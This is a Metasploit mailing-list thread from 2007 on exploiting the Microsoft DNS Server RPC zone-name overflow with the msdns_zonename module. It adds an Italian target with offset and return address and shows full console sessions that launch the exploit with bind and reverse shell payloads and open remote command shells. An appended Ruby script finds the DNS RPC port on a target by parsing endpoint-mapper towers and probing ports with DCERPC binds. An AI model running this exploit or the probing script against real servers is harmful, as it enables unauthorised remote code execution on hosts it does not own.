Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: diaul at devilopers.org (diaul)
Date: Wed, 18 Apr 2007 11:05:05 +0200
Hi,
you can simply add this target:

  [ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],

By the way, some time ago I sent all the Windows Italian opcodes to skape and they are now available in the Metasploit opcode DB.

Here is the msf3 session:

<CUT>
msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2003 Server SP0 English
   4   Windows 2003 Server SP1-SP2 English

msf exploit(msdns_zonename) > set TARGET 2
TARGET => 2
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(msdns_zonename) > set RHOST 10.4.14.47
RHOST => 10.4.14.47
msf exploit(msdns_zonename) > exploit

[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1029
[*] Trying target Windows 2000 Server SP0-SP4+ Italian...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444)

Microsoft Windows 2000 [Versione 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
</CUT>

Ciao :)
diaul

Giorgio Casali wrote:
Hi,
is it possible to have it for the Italian version?
Thanks

2007/4/16, H D Moore <hdm at metasploit.com>:

The exploit module has been merged to stable, use 'Online Update' or 'svn update' to grab it.

The module's default target will exploit Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2. All targets are designed for the English locale. If you have a non-English system, submit targets.

The Windows 2003 SP0 target may not be reliable. The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in use. We use the SEH overwrite method for all targets and the /GS stack prevention means we will not be able to use standard hardware DEP bypass techniques (return to NTDLL to disable NX).

The RPORT option defaults to '0' and will contact the endpoint mapper of the target system in order to determine the real RPC port at runtime. This saves a step, but it does mean that one of port 135 or 593 needs to be accessible on the target. If you are attacking a system with only ports > 1025 allowed through the firewall, you will need to locate the RPC service and set RPORT manually.
To use the module, open the console interface, and run:

msf> use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) >
msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
msf exploit(msdns_zonename) > set <payload options>
msf exploit(msdns_zonename) > set RHOST <target>
msf exploit(msdns_zonename) > exploit

-- example --

                 < metasploit >
                 ------------
                        \   ,__,
                         \  (oo)____
                            (__)    )\
                               ||--|| *

       =[ msf v3.0
+ -- --=[ 184 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 33 aux

msf > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(msdns_zonename) > set LHOST 192.168.0.127
LHOST => 192.168.0.127
msf exploit(msdns_zonename) > set LPORT 4444
LPORT => 4444
msf exploit(msdns_zonename) > set RHOST 172.16.233.128
RHOST => 172.16.233.128
msf exploit(msdns_zonename) > exploit

[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1356
[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

c:\>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: application/x-ruby
Size: 4763 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.rb>
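Editor's note on the RPORT behaviour described in the quoted message. The module resolves RPORT=0 by asking the endpoint mapper on 135/593 for the interface's protocol tower; when those ports are filtered you have to find the ncacn_ip_tcp port yourself. The following is an added example and is not code from this thread or from the msdns_zonename module. It is plain Ruby (the framework's language) using only the standard library: it parses an endpoint-mapper tower to recover the port, and builds a DCERPC bind for the DNS interface UUID so candidate high ports can be probed for a bind_ack. The tower and bind_ack bytes are constructed for the example, and locate_by_bind is a hypothetical helper that opens real sockets, so only point it at a host you are authorized to test.

```ruby
require 'socket'

# Added example, not code from this thread or the msdns_zonename module. It does
# by hand what the RPORT notes above describe: parse the protocol tower the
# endpoint mapper (TCP 135 / HTTP 593) returns to get the real ncacn_ip_tcp port,
# and, when 135/593 are filtered, find the service by sending a DCERPC bind for
# the interface UUID to candidate high ports. All sample bytes are constructed.

MSDNS_UUID = '50abc2a4-574d-40b3-9d66-ee4fd5fba076' # interface from the session log
NDR_UUID   = '8a885d04-1ceb-11c9-9fe8-08002b104860' # NDR transfer syntax v2.0

# UUID string <-> 16-byte NDR encoding (first three fields little-endian).
def uuid_to_bytes(s)
  a, b, c, d, e = s.split('-')
  [a.hex].pack('V') + [b.hex, c.hex].pack('vv') + [d + e].pack('H*')
end
def bytes_to_uuid(b)
  a, b2, c = b.unpack('Vvv')
  tail = b[8, 8].unpack1('H*')
  format('%08x-%04x-%04x-%s-%s', a, b2, c, tail[0, 4], tail[4, 12])
end

# An ncacn_ip_tcp tower as ept_lookup hands it back (used to build the sample).
def build_tower(uuid, major, minor, port, ip)
  floors = [
    [19, 0x0d, uuid_to_bytes(uuid), major, 2, minor].pack('vCa16vvv'), # interface
    [19, 0x0d, uuid_to_bytes(NDR_UUID), 2, 2, 0].pack('vCa16vvv'),     # transfer syntax
    [1, 0x0b, 2, 0].pack('vCvv'),                                      # RPC connection-oriented
    [1, 0x07, 2, port].pack('vCvn'),                                   # TCP port, big-endian
    [1, 0x09, 4].pack('vCv') + ip.split('.').map(&:to_i).pack('C4')    # IPv4 address
  ]
  [floors.size].pack('v') + floors.join
end

# Walk the floors (each is LHS-len, LHS, RHS-len, RHS) and pull out the fields.
def parse_tower(t)
  out = {}
  off = 2
  t.unpack1('v').times do
    lhs_len = t[off, 2].unpack1('v'); lhs = t[off + 2, lhs_len]; off += 2 + lhs_len
    rhs_len = t[off, 2].unpack1('v'); rhs = t[off + 2, rhs_len]; off += 2 + rhs_len
    case lhs.getbyte(0)
    when 0x0d # UUID floor: the interface, or the NDR transfer syntax
      uuid, ver = bytes_to_uuid(lhs[1, 16]), "#{lhs[17, 2].unpack1('v')}.#{rhs.unpack1('v')}"
      uuid == NDR_UUID ? (out[:transfer] = ver) : out.merge!(uuid: uuid, version: ver)
    when 0x0b then out[:proto] = 'ncacn_ip_tcp'
    when 0x07 then out[:port]  = rhs.unpack1('n')
    when 0x09 then out[:ip]    = rhs.unpack('C4').join('.')
    end
  end
  out
end

# What RPORT=0 computes: the TCP port for one interface, nil if not registered.
def rpc_port_for(towers, uuid)
  towers.map { |t| parse_tower(t) }
        .find { |e| e[:uuid] == uuid && e[:proto] == 'ncacn_ip_tcp' }&.fetch(:port)
end

# DCERPC bind PDU (ptype 11): one context, abstract syntax + NDR transfer syntax.
def build_bind(uuid, major, minor, call_id = 1)
  ctx  = [0, 1, 0].pack('vCC') + uuid_to_bytes(uuid) + [major, minor].pack('vv') +
         uuid_to_bytes(NDR_UUID) + [2, 0].pack('vv')
  body = [4280, 4280, 0, 1, 0, 0].pack('vvVCCv') + ctx # max_xmit, max_recv, assoc, n_ctx
  [5, 0, 11, 0x03, 0x10, 0, 0, 0, 16 + body.bytesize, 0, call_id].pack('C8vvV') + body
end

# :bind_ack_accepted / :bind_ack_rejected / :bind_nak / :unexpected_pdu / :not_dcerpc
def classify_bind_reply(pdu)
  return :not_dcerpc unless pdu.bytesize >= 16 && pdu.getbyte(0) == 5
  return :bind_nak if pdu.getbyte(2) == 13
  return :unexpected_pdu unless pdu.getbyte(2) == 12
  off = (24 + 2 + pdu[24, 2].unpack1('v') + 3) & ~3 # skip sec_addr, align p_result_list
  pdu[off + 4, 2].unpack1('v').zero? ? :bind_ack_accepted : :bind_ack_rejected
end

# Constructed bind_ack with sec_addr "1029" and one context result (0 = accepted).
def sample_bind_ack(accepted = true)
  sec  = "1029\0"
  body = [4280, 4280, 0x1234, sec.bytesize].pack('vvVv') + sec
  body << "\0" until (16 + body.bytesize) % 4 == 0
  r = accepted ? 0 : 2
  body << [1, 0, 0, r, r].pack('CCvvv') + uuid_to_bytes(NDR_UUID) + [2, 0].pack('vv')
  [5, 0, 12, 0x03, 0x10, 0, 0, 0, 16 + body.bytesize, 0, 1].pack('C8vvV') + body
end

# Manual fallback for a firewall that only passes ports > 1025: bind to each
# candidate, keep the first that accepts the interface. Hypothetical helper,
# does real network I/O (Ruby 2.6+ for rescue inside the block).
def locate_by_bind(host, ports, timeout = 3)
  ports.find do |port|
    Socket.tcp(host, port, connect_timeout: timeout) do |s|
      s.write(build_bind(MSDNS_UUID, 5, 0))
      IO.select([s], nil, nil, timeout) && classify_bind_reply(s.readpartial(4096)) == :bind_ack_accepted
    end
  rescue SystemCallError, IOError
    false
  end
end
```

Usage: feed parse_tower the towers an ept_lookup returns and rpc_port_for gives the value you would set as RPORT; with 135/593 filtered, locate_by_bind('target', (1025..1100).to_a) walks the high ports and returns the first one whose bind_ack accepts the 50abc2a4-...:5.0 context. A bind_nak or a rejected result means some other RPC server owns that port, which is why the probe checks the context result rather than just "something DCERPC answered".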
Current thread:
- Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
- Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
- Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)